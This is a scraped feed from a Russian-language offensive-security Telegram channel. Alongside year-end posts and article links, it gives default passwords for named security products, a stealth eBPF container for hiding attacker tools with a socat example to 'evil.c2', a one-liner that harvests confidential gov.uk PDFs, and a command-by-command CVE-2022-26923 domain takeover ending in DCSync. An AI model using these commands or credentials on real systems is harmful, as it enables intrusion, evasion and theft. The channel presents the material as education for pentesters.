Похек – Telegram
Похек
16.2K subscribers
2.08K photos
110 videos
243 files
3.05K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @PoxekAds_bot или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Forwarded from BI.ZONE Bug Bounty
🏆 No more tears, good vibes only: подводим итоги года

Мы думали-думали, что же такое особенное подарить нашей десятке лучших... А потом как придумали! На двух загадочных фото в посте — подсказка ;)

А это список самых крутых багхантеров на нашей платформе в 2023 году:

1️⃣r0hack
2️⃣al88nsk
3️⃣artebels
4️⃣kwel
5️⃣ub1k
6️⃣BlackFan
7️⃣hodiebee
8️⃣freeman
9️⃣sergeym
1️⃣0️⃣zero-0x00 
1️⃣1️⃣arkiix

Хотим сказать спасибо всем, кто упорно багхантил на платформе весь год и поддерживал нас. 

А всех из десятки от души поздравляем, в ближайшее время свяжемся и отправим подарки.

Stay tuned!

UPD
arkiix влетел в рейтинг уже после подведения итогов, так что наш топ-10 магией Деда Мороза превратился в топ-11. Так держать!
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤‍🔥1🎄11
E-mail Injection; Инъекции в почтовую функциональность веб-приложений

Порой разработчикам необходимо создавать формы – разделы для сбора информации от пользователей веб-приложения. Было придумано множество способов обработки и сбора ответов пользователей на формы. Выбор подходящего зависит от спектра условий: вида и предполагаемого объёма данных, допустимого объёма выделенного хранилища, желаемых характеристик доступа, ... ;

Так сложилось, что одним из вариантов решения упомянутой задачи является использование электронной почты. Электронная почта – комплексная технология, в работе которой задействован целый список компонентов.

👉 Сохраняй

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
12
GIGANEWS. Главные события 2023 года по версии «Хакера»

Год под­ходит к кон­цу, некото­рые уже начина­ют резать салаты, а зна­чит, приш­ло вре­мя огля­нуть­ся назад и вспом­нить самые важ­ные, инте­рес­ные и забав­ные события, которы­ми он нам запом­нится. По тра­диции мы сос­тавили для тебя под­борку наибо­лее ярких взло­мов, атак, уяз­вимос­тей, фей­лов и дру­гих событий ухо­дяще­го 2023 года. Будет инте­рес­но, пог­нали!

В статье подвели итоги по следующим аспектам:
- Атака года
- Уязвимость года
- Утечка года
- Исследование года
- Блокировка года
- Нарушитель приватности года
- Малварь года
- Хардверный взлом года
- Странность года
- Фейл года
- Хайп года

👉 Очень советую прочитать тем, кто особо не следил за ИБ новостями.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
103
Не ну вы поняли)

Новые программы для тех, кто не собирается отдыхать на новогодние праздники

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
21😎81
🌚 А вот и моя статистика подъехала. Практически миллион просмотров на постах за год. Великая цифра!!
В следующем году постарается сделать как минимум х1.5, а то и больше!!
А также +3.5к подписчиков на канале, то бишь канал за этот год вырос в более чем 2 раза. Всем спасибо, что вы были этот год со мной. Следующий год обещает быть ещё более взрывным!! 🪄🪄
Please open Telegram to view this post
VIEW IN TELEGRAM
25❤‍🔥8🔥43👏1
⚠️⚠️⚠️⚠️⚠️ Знаете что мне нравится? Аудитория канала :)

🌲 Наконец-то настали новогодние выходные. Кто-то вчера досдал проекты, кто-то планирует багхантить, пока остальные отдыхают. Я лично собираюсь так сильно отоспаться, насколько мне хватит сил. Что и вам рекомендую :D

🌚 Этот год вышел вполне успешым. Побывал мне кажется в 5 раз больше на конференциях, чем в прошлом году. Какие-то дали новых знакомых, какие-то помогли найти новую любимую работу, какие-то были душными и бесполезными (Газпром.тех я про тебя). Открытие 🏠 КиберДома было интересным событием второго полугодия 2023 года. Успешно выступал, как на тему ИБэшечка (фирменная преза), так и на тему Pivoting. За все выступления получал огромный фидбек от знакомых и ранее не знакомых людей, что было очень приятно 🙏 . Ну и конечно ребрендинг канала, который прошёл настолько успешно, насколько даже я не ожидал, если честно)

🌚 Но, но, но будущий год обещает быть ещё лучше 🌚
Новые партнёрства, постараюсь выступать почаще (если буду успевать готовить темы), прогрессивный рост канала, улучшение контента: постараюсь делать контент одновременно для начинающих ребят и для тех, кто уже разбираются.

🌚 Обязательно выпущу мерч Похек. Планируются как минимум стикерпаки и футболки. Пока проблемы с нахождением годных производителей. Если у вас есть опыт заказа, то напишите в ЛС, пожалуйста.

🌚 А ещё, кое что очень крутое готовим. Будет ... а вот узнаете в следующем году

👉Всем спасибо, дальше будет ещё интереснее!! Всех с наступающим Новым Годом ❤️

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
257🔥6🎄4❤‍🔥221
Похек pinned «⚠️⚠️⚠️⚠️⚠️ Знаете что мне нравится? Аудитория канала :) 🌲 Наконец-то настали новогодние выходные. Кто-то вчера досдал проекты, кто-то планирует багхантить, пока остальные отдыхают. Я лично собираюсь так сильно отоспаться, насколько мне хватит сил. Что и вам…»
Всех поздравляю с Новым Годом!!
🌲🌲🌲🌚🌚🌚💰💰🎁🎁
Please open Telegram to view this post
VIEW IN TELEGRAM
39🔥106🎄41
Forwarded from true_security
на пентестах бывают случаи когда компрометация происходит через средства обнаружения атак и средства защиты....далеко не все фильтруют сетевой доступ к компонентам СЗИ.
Так сказать, спасибо за дефолтные пароли:
- rvision soar/deception/etc... ssh root:pxtm0222; postgres rvision:pxtm0222

- maxpatrol VM: Administrator:P@ssw0rd

- maxpatrol siem: Administrator:P@ssw0rd; rabbitmq: siem:P@ssw0rd или mpx_siem:P@ssw0rd

- pt xdr: Administrator:P@ssw0rd

- pt nad: administrator:P0sitive или administrator:Administr@t0r

- security vision soar: postgres postgres:1q2w#E$R

- kuma (kaspersky siem): admin:mustB3Ch@ng3d!

Докидывайте дефолтные пароли сзи в комментах)
🔥122
🕶 Похек попал в ежегодный список топовых ИБ-каналов
Please open Telegram to view this post
VIEW IN TELEGRAM
38🔥13🎉8❤‍🔥1
А я в каком-то смысле тоже джун...

thx @wearetyomsmnv

#meme

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
28🐳4😎4
This media is not supported in your browser
VIEW IN TELEGRAM
🔴 nysm
Скрытый контейнер для постэксплуатации

#eBPF #offensive

С ростом популярности offensive инструментов, основанных на eBPF, начиная от кражи учетных данных и заканчивая руткитами, скрывающими свой собственный PID, авторам пришел в голову вопрос: Можно ли сделать eBPF невидимым в глазах админа? В результате они создали nysm, eBPF stealth контейнер, предназначенный для того, чтобы сделать инструменты атакующих незаметными для системных администраторов, не только скрывая eBPF, но и многое другое:
- bpftool
- bpflist-bpfcc
- ps
- top
- sockstat
- ss
- rkhunter
- chkrootkit
- lsof
- auditd
- и другое

Как это работает?
Поскольку eBPF не может перезаписывать возвращаемые значения или адреса ядра, наша цель - найти вызов самого низкого уровня, взаимодействующий с адресом пользовательского пространства, чтобы перезаписать его значение и скрыть нужные объекты. Чтобы отличить события nysm от других, все выполняется в отдельном пространстве имен PID.


Установка:
sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y; git clone https://github.com/eeriedusk/nysm; cd nysm; bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h; make


Использование:
Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.

-d, --detach Run COMMAND in background
-r, --rm Self destruct after execution
-v, --verbose Produce verbose output
-h, --help Display this help
--usage Display a short usage message

# Примеры
./nysm bash
./nysm -r ssh user@domain
./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443


👉 https://github.com/eeriedusk/nysm

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
1233😎1
Forwarded from SHADOW:Group
📁 Массовый поиск конфиденциальных данных в PDF-файлах

Исследуя таргет часто попадается много pdf'ок, которые могут содержать конфиденциальные данные. Просматривать вручную все это очень долго, а потому можно попробовать автоматизировать этот процесс.

1️⃣ Используем gau для сбора конечных точек из wayback, urlscan и т.д.
2️⃣ Фильтруем конечные точки по расширению .pdf с помощью Grep.
3️⃣ Проверяем с httpx, что url живой и возвращает 200 ОК.
4️⃣ С помощью curl'а смотрим все живые pdf'ки.
5️⃣ Конвертируем PDF в текст. Для этого есть утилитка pdftotext, которая, как видно из названия, умеет переводить из pdf в текст. Устанавливается так:
sudo apt install poppler-utils

6️⃣ Используем Grep для некоторых чувствительных слов, таких как "internal use only" или "confidential" и т.д.

В результате чего получим такую команду:

for i in $(echo "gov.uk" | gau --subs --threads 16 | grep -E -o 'https?://[^[:space:]]+\.pdf' | httpx -silent -mc 200); do if curl -k -s $i | pdftotext -q - - | grep -Eaiq 'confidential|internal use only'; then echo $i | tee output.txt; fi; done


Эта команда сканирует веб-сайт "gov.uk" и его поддомены в поиске URL-ов с PDF-файлами. Затем она проверяет каждый PDF-файл на наличие строк "confidential" или "internal use only" и записывает эти URL-ы в файл "output.txt".

Вы можете включить свое творческое мышление и попытаться изменить этот скрипт по своему усмотрению. Например, используя katana вместо gau или проверяя наличие других чувствительных слов, используя другие расширения и т.д. Использование собственного творческого подхода даст вам максимальную отдачу!

#web #recon #leak
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2142
This media is not supported in your browser
VIEW IN TELEGRAM
🔵 Галопом по Европам: Легитимные процессы Windows на пальцах
#windows

Статья-памятка - быстро и понятно о легитимных процессах Windows: какой процесс за что отвечает, какие нормальные свойства имеют процессы, и заправка в виде небольшого количества краткой, но полезной информации.

Подойдет всем - и тем, кто боится страшных букв в Диспетчере задач, и тем, кому просто интересно, что за что отвечает, и для чего это все нужно.

Статья за авторством @exc3pt10n


⚡️ https://habr.com/en/articles/784960/

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥136❤‍🔥22
Top 10 web hacking techniques of 2023 - конкурс открыт
#portswigger

За последний год множество исследователей в области безопасности поделились своими ресерчами с сообществом в виде записей в блогах, презентаций и технических статей.

Однако из-за огромного объема хорошие статьи могут быть упущены из виду и быстро забыты. Поэтому с 2006 года сообщество ежегодно объединяется для отбора самых интересных работ.

Подача заявок:
Чтобы подать заявку, просто укажите ссылку на исследование и, по желанию, краткий комментарий, объясняющий, что нового в этой работе.

❤️ Подать заявку на номинацию


Ниже указал актуальный список статей, которые уже отобрали для оценки в номинацию:

- Ransacking your password reset tokens
mTLS: When certificate authentication is done wrong
- Smashing the state machine: the true potential of web race conditions
- Bypass firewalls with of-CORs and typo-squatting
- RCE via LDAP truncation on hg.mozilla.org
- Cookie Bugs - Smuggling & Injection
- OAuth 2.0 Redirect URI Validation Falls Short, Literally
- Prototype Pollution in Python - Abdulrah33m's Blog
- Pretalx Vulnerabilities: How to get accepted at every conference
- From Akamai to F5 to NTLM... with love.
- Сan I speak to your manager? hacking root EPP servers to take control of zones
- Blind CSS Exfiltration: exfiltrate unknown web pages
- Compromising F5 BIGIP with Request Smuggling
- Server-side prototype pollution: Black-box detection without the DoS
- Tricks for Reliable Split-Second DNS Rebinding in Chrome and Safari
- HTML Over the Wire
- SMTP Smuggling - Spoofing E-Mails Worldwide
- DOM-based race condition: racing in the browser for fun
- Metamask Snaps: Playing in the Sand
- CVE-2022-4908: SOP bypass in Chrome using Navigation API
- Code Vulnerabilities Put Proton Mails at Risk

Моё лично мнение, что список очень интересный и в нашем комьюнити могут найтись те специалисты, которые захотят или заинтересуются отправкой своих работ в эту номинацию.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
162
Forwarded from wr3dmast3r vs pentest
Многие оставляют недоработанными вектора атак с self-XSS или XSS, заблокированной CSP. Иногда стоит уделить достаточно внимания каждой такой находке и посмотреть на уязвимость с другой стороны 😈

В этой статье мы рассмотрим различные методы и техники, которые расширяют границы XSS-атак: эксплуатацию XSS через service-worker, self-XSS в один клик и другие сочетания уязвимостей 💎

https://telegra.ph/XSS-Advanced-Level-01-09
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥114😈22
Потратился на праздниках? Самое время начать багхантить!

Если кто не заметил, в конце года на Standoff появилось пять новых программ с выплатами до 1 млн рублей. И многие из них закроются уже в конце января.

🔜 Но если начать ломать прямо сейчас, есть все шансы получить максимальное баунти (а за некоторые криты дают даже ящик фирменного «Блэк Хета» от Standoff 365 в качестве приятного бонуса).
Please open Telegram to view this post
VIEW IN TELEGRAM
👏9
Forwarded from PurpleBear (Vadim Shelest)
Матрица компетенций

Всем привет! Надеюсь, что все хорошо отдохнули, набрались сил и готовы к покорению новых профессиональных и карьерных вершин🏆

В нашей отрасли очень много направлений для профессионального роста и развития навыков и компетенций, поэтому очень часто особенно у новичков возникает закономерный вопрос, какой путь выбрать, что и в какой последовательности изучать?! 😜
Но сначала все таки нужно определиться с целями и направлением развития, а потом качать соответствующие навыки и компетенции. О целеполагании и приоритетах мы поговорим в следующих заметках в рамках этой новой менеджерской рубрики😎

А сейчас, немного забегая вперед рассмотрим методы достижения цели повышения грейда offensive security специалиста. Я уже рассказывал про такой инструмент, как матрица компетенций от компании DETEACT, а сегодня я бы хотел пошарить черновик нашей подобной матрицы.

Это пока только лишь верхнеуровневая структура, в планах детально описать каждый этап относительно хард и софт скиллов с подробными рекомендациями по развитию (референсы на литературу, статьи, лабы и прочее) чтобы было удобно иметь под рукой план развития для каждого грейда. А также добавить ключевые управленческие компетенции необходимые для эффективного менеджмента команды.

PS: Можно оставлять комментарии и предложения прямо в доке, ну и финальную версию обязательно расшарю для публичного доступа без ограничений
🔥113
Forwarded from Purple Chronicles (ELK Enjoyer)
Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)🖼️

Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).

🐍 Для эксплуатации используем утилиту Certipy, краткая справка по ней представлена ниже:
# Установка
pip install certipy-ad

# Запрос сертификата
# для certipy-ad v3.0.0:
certipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName
# для certipy-ad v4.8.2:
certipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10

# Авторизация с сертификатом для извлечения NTLM-хэша:
certipy auth -pfx username.pfx -dc-ip 10.10.10.10
Начнем атаку с добавления компьютера в домен при помощи Impacket-Addcomputer
addcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'
Запрашиваем сертификат для учётной записи компьютера (шаблон Machine) и авторизуемся с ним:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine

certipy auth -pfx testpc.pfx

Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:
Get-ADComputer TESTPC -properties dnshostname,serviceprincipalname
Set-ADComputer TESTPC -DnsHostName DC.domain.local # вернёт ошибку из-за дублирующейся SPN
Set-ADComputer TESTPC -ServicePrincipalName @{} # обнуляем SPN
Set-ADComputer TESTPC -DnsHostName DC.domain.local

Возвращаемся на атакующий хост и запрашиваем новый сертификат:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine

Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:
certipy auth -pfx dc.pfx
...
[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733

Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:
secretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt

Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!🔺
#пентест #AD
Please open Telegram to view this post
VIEW IN TELEGRAM
1353❤‍🔥2